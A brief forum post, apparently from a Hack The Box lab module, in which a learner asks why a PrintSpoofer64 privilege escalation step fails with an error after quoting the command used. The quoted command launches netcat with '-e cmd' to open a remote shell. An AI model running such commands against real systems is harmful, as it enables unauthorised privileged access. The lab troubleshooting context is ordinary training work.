ATTACKING ENTERPRISE NETWORKS - Exploitation & Privilege Escalation

Dear all, I ask information about the first step to escalation with PrintSpoofer64. I make all step but when run this command:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c “c:\DotNetNuke\Portals\0\nc.exe 443 -e cmd”
I receive this error:[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
CreateProcessAsUser() failed. Error: 216

I solve it with htb support.